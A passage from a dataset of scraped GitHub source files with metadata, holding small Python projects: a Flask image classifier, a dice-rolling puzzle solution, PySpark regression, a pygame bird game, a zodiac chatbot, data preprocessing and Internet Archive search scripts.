"django.contrib.admin.site.register", "line_number": 38, "usage_type": "call"}, {"api_name": "accounts.models.wallet.Wallet", "line_number": 38, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "29343500447", "text": "# import necessary libraries\nimport cv2\nimport tensorflow as tf\nimport os\nfrom tensorflow.keras.preprocessing import image\nimport numpy as np\nfrom tensorflow import keras\nfrom keras.models import load_model\nfrom flask import (\n Flask,\n render_template,\n jsonify,\n request,\n redirect)\n\napp = Flask(__name__)\n\n# create function to parse the image and predict\ndef prepare(filepath):\n IMG_SIZE = 100\n x = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)\n x = cv2.resize(x, (IMG_SIZE,IMG_SIZE))\n x = x.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n x = tf.cast(x, tf.float32)\n return x\n \n \ndef predict(filepath): \n CATEGORIES = ['Dog','Cat']\n model = load_model(\"catsdogs.model\")\n predictions = model.predict([prepare(filepath)])\n return CATEGORIES[int(predictions[0][0])]\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"Return the homepage.\"\"\"\n return render_template(\"index.html\")\n\n@app.route(\"/filelink/<file_name>\")\ndef filelink(file_name):\n result = predict(file_name)\n return jsonify(result)\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "KalicoRacer/P3-paranormal_hacktivity", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1072, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "keras.models.load_model", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "13097145835", "text": "from sys import stdin\nfrom collections import deque\n\ndef solution(N, M, dice, board, moves):\n EAST, WEST, NORTH, SOUTH = 1, 2, 3, 4\n inst = {EAST:(1, 0, slice(3,6), (0,1)),\n WEST:(-1, -1, slice(3,6), (0,-1)),\n NORTH:(-1, -1, slice(1,None,3), (-1,0)),\n SOUTH:(1, 0, slice(1,None,3), (1,0))} # rotation, replace, slice, offset\n dice_map = [0]*9\n dice_btm = 0\n\n for m in moves:\n rot, rep, slc, off = inst[m]\n t_dice = [sum(i) for i in zip(dice, off)]\n if all([0 <= c < l for c, l in zip(t_dice,(N,M))]):\n dice = t_dice\n vals = deque(dice_map[slc])\n vals.rotate(rot)\n\n new_bottom = vals[rep]\n vals[rep] = dice_btm\n dice_btm = new_bottom\n\n dice_map[slc] = vals\n\n if board[dice[0]][dice[1]] == 0:\n board[dice[0]][dice[1]] = dice_btm\n else:\n dice_btm = board[dice[0]][dice[1]]\n board[dice[0]][dice[1]] = 0\n\n print(dice_map[4])\n\nN, M, dice, board, moves = 0, 0, [0,0], [], []\nfor i, row in enumerate(stdin.readlines()):\n if i == 0:\n N, M, dice[0], dice[1], _ = map(int, row.strip().split(' '))\n continue\n if i <= N:\n board.append(list(map(int, row.strip().split(' '))))\n else:\n moves = tuple(map(int, row.strip().split(' ')))\n\nsolution(N, M, dice, board, moves)\n", "repo_name": "grasshopperTrainer/coding_practice", "sub_path": "baekjoon/accepted/14499 주사위 굴리기.py", "file_name": "14499 주사위 굴리기.py", "file_ext": "py", "file_size_in_byte": 1417, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stdin.readlines", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "18362600335", "text": "from pyspark.sql import SparkSession\r\nfrom pyspark.ml.regression import LinearRegression\r\nfrom pyspark.ml.linalg import Vectors\r\nfrom pyspark.ml.feature import VectorAssembler\r\n\r\nimport platform \r\nprint(platform.python_version())\r\n\r\nspark = SparkSession.builder.appName('lr_example').getOrCreate()\r\n\r\n# Use Spark to read in the Ecommerce Customers csv file.\r\ndata = spark.read.csv(\"hdfs:///user/maria_dev/MachineLearning/Ecommerce_Customers.csv\",inferSchema=True,header=True)\r\n# Print the Schema of the DataFrame\r\nprint(\"-------------------------------------data and data schema----------------------------------------------\")\r\ndata.printSchema()\r\ndata.show()\r\n\r\n# Set up dataframe for machine learning\r\n# A few things we need to do before Spark can accept the data!\r\n# It needs to be in the form of two columns\r\n# (\"label\",\"features\")\r\n\r\nassembler = VectorAssembler(\r\n inputCols=[\"Avg Session Length\", \"Time on App\", \r\n \"Time on Website\",'Length of Membership'],\r\n outputCol=\"features\")\r\noutput = assembler.transform(data)\r\n\r\nprint(\"-------------------------------------output features-------------------------------------------------------\")\r\noutput.select(\"features\").show()\r\noutput.show()\r\nfinal_data = output.select(\"features\",'Yearly Amount Spent')\r\ntrain_data,test_data = final_data.randomSplit([0.7,0.3])\r\n\r\nprint(\"-------------------------------------train test data information----------------------------------------------\")\r\ntrain_data.describe().show()\r\ntest_data.describe().show()\r\n\r\n# Create a Linear Regression Model object\r\nlr = LinearRegression(labelCol='Yearly Amount Spent')\r\n\r\n# Fit the model to the data and call this model lrModel\r\nlrModel = lr.fit(train_data)\r\n\r\n# Print the coefficients and intercept for linear regression\r\nprint(\"Coefficients:\" + str(lrModel.coefficients) )\r\nprint(\"Intercept: \" + str(lrModel.intercept))\r\ntest_results = lrModel.evaluate(test_data)\r\n# Interesting results....\r\ntest_results.residuals.show()\r\nunlabeled_data = test_data.select('features')\r\npredictions = lrModel.transform(unlabeled_data)\r\npredictions.show()\r\nprint(\"RMSE: \" + str(test_results.rootMeanSquaredError))\r\nprint(\"MSE: \"+ str(test_results.meanSquaredError))\r\nspark.stop()\r\n\r\n", "repo_name": "AlphaSunny/MachineLearning", "sub_path": "pyspark/LinearRegression/LinearRegressionEcommerceCustomers.py", "file_name": "LinearRegressionEcommerceCustomers.py", "file_ext": "py", "file_size_in_byte": 2213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "platform.python_version", "line_number": 7, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 9, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 9, "usage_type": "name"}, {"api_name": "pyspark.ml.feature.VectorAssembler", "line_number": 23, "usage_type": "call"}, {"api_name": "pyspark.ml.regression.LinearRegression", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "44969696997", "text": "from typing import List\n\nimport pygame\nfrom pygame import Rect\nfrom random import randint\n\npygame.init()\n\nWIDTH, HEIGHT = 800, 600\nGPS = 60\n\nwindows = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n#шрифт текста на экране\nfont1 = pygame.font.Font(None, 35)\nfon2 = pygame.font.Font(None, 85)\n\nimgfon =pygame.image.load('image/fon.png') #картинка фона\nimgBird = pygame.image.load('image/bird.png') #картинка птички\nimgPipeupp = pygame.image.load('image/pipe_top.png')#труба верхняя\nimgPipedown = pygame.image.load('image/pipe_bottom.png')\n\n#музыка фон\npygame.mixer.music.load('music/shi_fon.mp3') #загрузка звукового файла\npygame.mixer.music.set_volume(0.1) #уменьшение громкости от 0 жо 1\npygame.mixer.music.play(-1) #постоянное воспроизведение (-1) повтор зациклена\n\n\n#музыка звуковые эффекты\nsndFall = pygame.mixer.Sound('music/mouse_ok_format.wav')\n\npy, sy, ay = HEIGHT // 2, 0, 0\nplayers = pygame.Rect(WIDTH // 3, py, 34, 24) #позиция и ширина и высота пряоугольника\n\nframe = 0\nanimatsiya = 0\nstat = 'start'\ntimer = 10\npipes = []\nfon = []\npipesScores = []\nlives = 3\nscores = 0\n\npipeSpeed = 3\npipeGateSize = 200\npipeGatePos = HEIGHT // 2\n\n\nfon.append(pygame.Rect(0, 0, 288, 600))\n\n\n\nplay = True\nwhile play:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n play = False\n\n #управление\n press = pygame.mouse.get_pressed()# состояние всех кнопок мыши\n keys = pygame.key.get_pressed()\n click = press[0] or keys[pygame.K_SPACE] #переменная нажатие на кнопку мыши либо на пробел\n\n if timer > 0:\n timer -= 1\n animatsiya = (animatsiya + 0.2) % 4\n\n #frame = (frame + 0.2) % 4\n pipeSpeed = 3 + scores // 100\n#фон\n for i in range(len(fon)-1, -1, -1):\n f = fon[i]\n f.x -= pipeSpeed // 2\n\n if f.right < 0:\n fon.remove(f)\n\n\n if fon[len(fon)-1].right <= WIDTH:\n fon.append(pygame.Rect(fon[len(fon)-1].right, 0, 288, 600))\n #fon.append(pygame.Rect(fon[len(fon)-1].right, 0, 288, 600))\n\n #Движение труб\n for i in range(len(pipes)-1, -1, -1):\n pipe = pipes[i]\n #pipe.x -= 3\n\n pipe.x -= pipeSpeed\n\n if pipe.right < 0:\n pipes.remove(pipe)\n if pipe in pipesScores:\n pipesScores.remove(pipe)\n\n if stat == 'start':\n if click and timer == 0 and len(pipes) == 0:\n stat = 'play'\n\n py += (HEIGHT // 2 - py) * 0.1\n players.y = py\n\n # если нажатие\n elif stat == 'play':\n if click:\n ay = -2\n else:\n ay = 0\n\n # вниз типа падение\n py += sy\n sy = (sy + ay + 1) * 0.98 # скорость\n players.y = py\n\n\n\n if len(pipes) == 0 or pipes[len(pipes) - 1].x < WIDTH - 200:\n pipes.append(pygame.Rect(WIDTH, 0, 52, pipeGatePos - pipeGateSize // 2))\n pipes.append(\n pygame.Rect(WIDTH, pipeGatePos + pipeGateSize // 2, 52, HEIGHT - pipeGatePos + pipeGateSize // 2))\n\n pipeGatePos += randint(-100, 100)\n if pipeGatePos < pipeGateSize:\n pipeGatePos = pipeGateSize\n elif pipeGatePos > HEIGHT - pipeGateSize:\n pipeGatePos = HEIGHT - pipeGateSize\n\n\n\n\n if len(pipes) == 0 or pipes[len(pipes)-1].x < WIDTH - 200:\n pipes.append(pygame.Rect(WIDTH, 0, 50, 200))\n pipes.append(pygame.Rect(WIDTH, 400, 50, 200))\n\n if players.top < 0 or players.bottom > HEIGHT:\n state = 'fall'\n\n for pipe in pipes:\n if players.colliderect(pipe):\n state = 'fall'\n\n # if pipe.right < players.left and pipe not in pipesScores:\n # pipesScores.append(pipe)\n # scores += 5\n\n\n\n\n\n\n # if len(pipes) == 0 or pipes[len(pipes)-1].x < WIDTH - 200:\n # pipes.append(pygame.Rect(WIDTH, 0, 50, 200))\n # pipes.append(pygame.Rect(WIDTH, 400, 50, 200))\n # ###\n # #проверка птичка в границах экрана\n # if players.top < 0 or players.bottom > HEIGHT:\n # stat = 'fall'\n # for pipe in pipes:\n # if players.colliderect(pipe):\n # stat = 'fall'\n #\n#разобраться почему птичка не возвр на прежденее положение и препятсявие не задевает , что то удалила( посмотреть\n\n\n elif stat == 'fall':\n sndFall.play() #звук нажатие\n sy, ay = 0, 0\n pipeGatePos = HEIGHT // 2\n stat = 'start'\n timer = 60\n\n lives -= 1 #уменьшение жизни при зароне\n if lives > 0:\n stat = 'start'\n timer = 60\n else:\n stat = 'game over'\n timer = 120\n\n else:\n py += sy\n sy = (sy + ay + 1) * 0.98 # скорость\n players.y = py\n\n if timer == 0:\n play = False\n\n windows.fill(pygame.Color('black'))\n for f in fon:\n windows.blit(imgfon, f)\n\n for pipe in pipes:\n if pipe.y == 0:\n rect = imgPipeupp.get_rect(bottomleft= pipe.bottomleft)\n windows.blit(imgPipeupp, rect)\n else:\n rect = imgPipedown.get_rect(topleft=pipe.topleft)\n windows.blit(imgPipedown, rect)\n\n imageBird = imgBird.subsurface(34 * int(animatsiya), 0, 34, 24)\n imageBird = pygame.transform.rotate(imageBird, -sy * 2)\n windows.blit(imageBird, players)# вывод птицы\n\n #print(animatsiya)\n text = font1.render('Очки: ' +str(scores), 1, pygame.Color('black'))\n windows.blit(text, (10,10))\n\n tex = font1.render('Жизни ' + str(lives), 1, pygame.Color('black'))\n windows.blit(tex, (10,HEIGHT- 30))\n\n pygame.display.update()\n clock.tick(GPS)\n\npygame.quit()\n", "repo_name": "MK129y/bird_up_and_stolbi", "sub_path": "bird_code_and_music.py", "file_name": "bird_code_and_music.py", "file_ext": "py", "file_size_in_byte": 6200, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 118, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 120, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 132, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 188, "usage_type": "call"}, {"api_name": "pygame.transform.rotate", "line_number": 201, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 201, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 205, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 208, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 211, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 211, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 214, "usage_type": "call"}]} +{"seq_id": "24863485771", "text": "\"\"\"A collection of function for doing my project.\"\"\"\nimport string\nimport random\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\n\n\n\ndef begin():\n \"\"\"This is main area of the chatbot, this where all\n of the functions connect back to and where the function\n ends\n \n Parameters\n ----------\n none\n \n Returns\n -------\n none\n \"\"\"\n \n chat = True\n while chat == True:\n \n \n # greeting function called to get their name/tell them\n # that this is a Zodiac sign guessing bot\n greet()\n \n # inputs a yes or not really to redirect them accordingly\n undstd = input(\"\\nZodi : Do you know what a Zodiac Sign is?\\n\"\n \" \\n\"\n \" If yes please respond 'Yes!', if not respond 'Not really'\\n\")\n \n # route if they don't need more info\n if undstd == 'Yes!': \n next = (no_info())\n if next == ask_bday:\n print(ask_bday)\n their_sign()\n break\n else: \n break \n # route if they need more info\n elif undstd == 'Not really':\n next = (more_info())\n if next == ask_bday:\n print(ask_bday)\n their_sign()\n break\n else:\n break\n else:\n chat = False\n break\n \n \ndef greet():\n \"\"\"This is my greeting funtion, I greet them with a \n random greeting from introduce list, then I take in\n their name and have my bot introduce themself\n \n Input\n ---------\n name : str\n takes in their name/nickname\n my_response : list\n list different ways to ask their name\n \n Outputs\n -------\n print : \n prints out welcome message/bot introduces self\n \"\"\"\n \n # picks random responce from list and has them input their name\n # to then add their name into the welcome message\n name = input(random.choice(introduce))\n print(\"\\nZodi : Hi there #, it's very nice to meet you!\\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" My name is Zodi The Zodiac Expert, I absolutely\\n\"\n \" love meeting new people, and also love telling \\n\"\n \" my new friends what their Zodiac sign is!\\n\".replace(\"#\", name))\n \n \n \ndef their_sign():\n \"\"\"Runs my other Zodiac_sign function and prints its\n results, then continues on to wrap up the function\n by pulling a random response from my relatable list \n and printing it, then printing my farewell string\n \n Inputs\n ----------\n relatable : list\n list of quirky response\n \n Output\n -------\n sign : \n outputs the sign of the person\n \"\"\"\n \n # outputs persons sign\n sign = zodiac_sign()\n \n # prints random response from relatable list\n print(random.choice(relatable))\n \n # wraps up the chat with my farewell string\n print(farewell)\n chat = False\n \n \n \ndef no_info():\n \"\"\"This is the function they're directed to if they\n don't need to learn about Zodiac signs, it asks them \n if I can tell them their sign, or if not it ends the chat\n \n Inputs\n ----------\n ask_per1 : str\n asks if bot can guess their sign\n say_sign: str\n conntinues or ends chat\n \n Returns\n -------\n ask_bday : str\n asks for their bday\n \"\"\"\n \n # inputs sure or no thank you and directs them accordingly\n say_sign = input(ask_per1)\n \n # continues on to ask their birth date or ends chat\n if say_sign == 'Sure!':\n return(ask_bday)\n \n elif say_sign == 'No thank you':\n print(\"\\nZodi : That's okay, have a nice day. Goodbye!\")\n chat = False\n else:\n chat = False\n\n \ndef more_info():\n \"\"\"This is the function that they're directed to if\n they don't know much about zodiac signs, it pulls \n some text from a website about Zodiac Signs\n \n Inputs\n ----------\n ask_per2 : str\n asks if I can guess their sign\n ask_bday : str\n asks for their birthday\n \n Returns\n -------\n ask_bday : str\n asks for their birth month/day\n \"\"\"\n \n # info/variables that gets text from website\n # this little chunk of how to convert the text is from \n #https://realpython.com/python-web-scraping-practical-introduction/\n url = \"https://www.astrology-zodiac-signs.com/\"\n page = urlopen(url)\n html = page.read().decode(\"utf-8\")\n soup = BeautifulSoup(html, \"html.parser\")\n table = soup.find('div',attrs={\"class\":\"main-b\"})\n \n # states where the text is from and how much to read\n print(give_info)\n \n \n print(table.get_text())\n \n # asks if I can now tell them their sign\n say_sign = input(ask_per2)\n \n # conditionals to direct them based on their answers to \n # me asking for their permission\n if say_sign == 'Sure!':\n return(ask_bday)\n elif say_sign == 'No thank you':\n print(\"\\nZodi : That's okay, have a nice day. Goodbye!\")\n chat = False\n else:\n chat = False\n \n \ndef zodiac_sign():\n \"\"\"This is the function that actually takes in their\n birth month/day and prints out their sign with the\n corresponding emoji symbol\n \n Parameters\n ----------\n month : int\n \n day : int\n \n Outputs\n ------\n print : str\n prints their sign\n \"\"\"\n \n # where they input their birth month/day\n month = int(input(\"Month# : \"))\n day = int(input(\"Day# : \"))\n \n # long series of conditionals to determine their sign\n # prints out their sign with the emoji that goes along with it\n if month == 1 and day <= 19:\n print('Results : Capricorn \\N{capricorn}')\n elif month == 1 and day > 19:\n print ('Results : Aquarius \\N{aquarius}')\n elif month == 2 and day <= 19:\n print ('Results : Aquarius \\N{aquarius}')\n elif month == 2 and day > 19:\n print ('Results : Pisces \\N{pisces}')\n elif month == 3 and day <= 20:\n print ('Results : Pisces \\N{pisces}')\n elif month == 3 and day > 20:\n print ('Results : Aries \\N{aries}')\n elif month == 4 and day <= 20:\n print ('Results : Aries \\N{aries}')\n elif month == 4 and day > 20:\n print ('Results : Taurus \\N{taurus}')\n elif month == 5 and day <= 20:\n print ('Results : Taurus \\N{taurus}')\n elif month == 5 and day >20:\n print ('Results : Gemini \\N{gemini}')\n elif month == 6 and day <= 20:\n print ('Results : Gemini \\N{gemini}')\n elif month == 6 and day > 20:\n print ('Results : Cancer \\N{cancer}')\n elif month == 7 and day <= 22:\n print ('Results : Cancer \\N{cancer}')\n elif month == 7 and day > 22:\n print ('Results : Leo \\N{leo}')\n elif month == 8 and day <= 22:\n print ('Results : Leo \\N{leo}')\n elif month == 8 and day > 22:\n print ('Results : Virgo \\N{virgo}')\n elif month == 9 and day <= 22:\n print ('Results : Virgo \\N{virgo}')\n elif month == 9 and day > 22:\n print ('Results : Libra \\N{libra}')\n elif month == 10 and day <= 22:\n print ('Results : Libra \\N{libra}')\n elif month == 10 and day > 22:\n print ('Results : Scorpio \\N{scorpius}')\n elif month == 11 and day <= 22:\n print ('Results : Scorpio \\N{scorpius}')\n elif month == 11 and day > 22:\n print ('Results : Sagittarius \\N{sagittarius}')\n elif month == 12 and day <= 23:\n print ('Results : Sagittarius \\N{sagittarius}')\n elif month == 12 and day > 23:\n print ('Results : Capricorn \\N{capricorn}')\n \n# long series of lists/variables that get used throughout the function\nintroduce = [\"Zodi : Hello lovely! What's your name? : \",\n \"Zodi : Hi friend! What's your name? : \"]\n\nrelatable = [\"\\nZodi : That's crazy, my mom is the same sign as you!\\n\",\n \"\\nZodi : OMG my mom's cousin's brother's dog is that sign!\\n\",\n \"\\nZodi : My bestfriend is that sign too, how crazy!\\n\",\n \"\\nZodi : That's one of my favorite signs how cool!\\n\",\n \"\\nZodi : Oof, my ex was that sign haha!\\n\"]\n\nfarewell = ('\\nZodi : Well it was absolutely wonderful getting to meet you!\\n'\n ' I hope you send your friends over to learn about their signs,\\n'\n ' hope to chat with you later, GoodBye!\\n'\n ' \\n'\n ' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n ' \\n'\n ' If you would like to know more about what your specific sign means,\\n'\n ' you can head over to https://www.astrology-zodiac-signs.com/\\n'\n ' to learn more about it!')\n\nask_bday = (\"\\nZodi : Yay, how exciting!\\n\"\n \" \\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" \\n\"\n \" I'll just need two things from you, the\\n\"\n \" month and day you were born!\\n\"\n \" \\n\"\n \" Please responce in the format way: \\n\"\n \" \\n\"\n \" Input the month # you were born, then hit return on keyboard\\n\"\n \" Then input the day # you were born, hit return again\\n\"\n \" \\n\"\n \" Example : If I was born Jan 3rd, I'd input\\n\"\n \" '1' then return, then '3' and return again\\n\")\n \ngive_info = (\"\\nZodi : That's absoloutely okay, I love getting\\n\"\n \" to teach people something new!\\n\"\n \" \\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" \\n\"\n \" Here's some information on Zodiac Signs from\\n\"\n \" https://www.astrology-zodiac-signs.com/,\\n\"\n \" if you'd just like to know what your sign means\\n\"\n \" you can just read the first little paragraph, but\\n\"\n \" if you'd like to deep-dive you can read the whole thing!\\n\"\n \" \\n\"\n \" ~SCROLL TO BOTTOM TO CONTINUE~\\n\")\n\nask_per1 = (\"\\nZodi : Perfect! Since you're my new friend,\\n\"\n \" can I tell you your Zodiac sign?\\n\"\n \" \\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" \\n\"\n \" Please respond 'Sure!' if I can or \\n\"\n \" 'No thank you' to end chat\\n\")\n\nask_per2 = (\"\\n Zodi : Now that you know a little bit more about\\n\"\n \" what a Zodiac Sign is, can I tell you yours?!\\n\"\n \" \\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" \\n\"\n \" Please respond 'Sure!' if I can or \\n\"\n \" 'No thank you' to end chat\\n\")\n\n \n", "repo_name": "bescobar25/COGS18-Final", "sub_path": "functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 10799, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.choice", "line_number": 80, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 110, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 172, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 174, "usage_type": "call"}]} +{"seq_id": "40265952237", "text": "import os\nimport pandas as pd\nimport torch\n\n\ndef makedir_csv():\n os.makedirs(os.path.join('.', 'data'), exist_ok=True)\n data_files = os.path.join('.', 'data', 'house_tiny.csv')\n with open(data_files, 'w') as f:\n f.write('NumRooms,Alley,Price\\n') # 列名\n f.write('NA,Pave,127500\\n')\n f.write('2,NA,106000\\n')\n f.write('4,NA,178100\\n')\n f.write('NA,NA,140000\\n')\n return data_files\n\n\ndef Handle_missing_values(csv_files):\n # 将连续的NAN值取平均值进行填充\n inputs, outputs = csv_files.iloc[:, 0:2], csv_files.iloc[:, 2]\n inputs = inputs.fillna(inputs.mean())\n return inputs, outputs\n\n\ndef get_dummy(inputs):\n # 将离散的NAN值置为0或1\n inputs = pd.get_dummies(inputs, dummy_na=True)\n # print(inputs)\n return inputs\n\n\n# ****将输入转换成张量****\ndef data_to_tensor(input, output):\n x, y = torch.tensor(input.values), torch.tensor(output.values)\n return x, y\n\n\ndata_file = makedir_csv()\ndata = pd.read_csv(data_file)\ninput, output = Handle_missing_values(data)\ninputs = get_dummy(input)\nx, y = data_to_tensor(inputs, output)\n# print(x)\n# print(y)\n\n# print(inputs)\n# print(data)\n\n", "repo_name": "Zhangxx-NaMuu/DeepLearningNote", "sub_path": "two/data_preprocessing.py", "file_name": "data_preprocessing.py", "file_ext": "py", "file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.makedirs", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "31834157997", "text": "#!/usr/bin/env python3\n\n#----------------------------------------------------------------------------------------\n#\n# Name: md-id.py\n# Version: v.2\n# Date: 2016-00-00\n# Author: David Durden\n# Description: Searches the Internet Archive for a provided term and generates\n# a list of item ids related to that serach term.\n# Usage: python3 md-id.py foo bar.txt\n# Dependencies: Requires the internetarchive library\n# <https://pypi.python.org/pypi/internetarchive>\n#\n#----------------------------------------------------------------------------------------\n\nimport sys\nfrom internetarchive import search_items\n\n# Search the Internet Archive for the first argument\nterm = sys.argv[1]\nprint(\"Searching IA for %s...\" % term)\nresults = search_items('collection:%s' % term)\nsys.stdout.flush()\n\n# Convert the result to a list of ids\nidentifiers = [i['identifier'] for i in results]\nfound = \"Found {0} identifiers.\"\nprint(found.format(len(identifiers)))\n\n# Write the list of ids to the file specified by the second argument\nwith open(sys.argv[2], 'wt') as outfile:\n writing = \"Writing to file {0} ...\"\n print(writing.format(sys.argv[2]),)\n sys.stdout.flush()\n outfile.write('\\n'.join(identifiers))\n print(\"done!\")\n", "repo_name": "drdn/dpi-rds", "sub_path": "ia-md/md-id.py", "file_name": "md-id.py", "file_ext": "py", "file_size_in_byte": 1315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "internetarchive.search_items", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "19789198714", "text": "import pytube, time\nfrom pytube.cli import on_progress\nurl = input('Enter a YouTube video link: ')\nyt = pytube.YouTube(url, on_progress_callback=on_progress)\nprint(f'The video is being 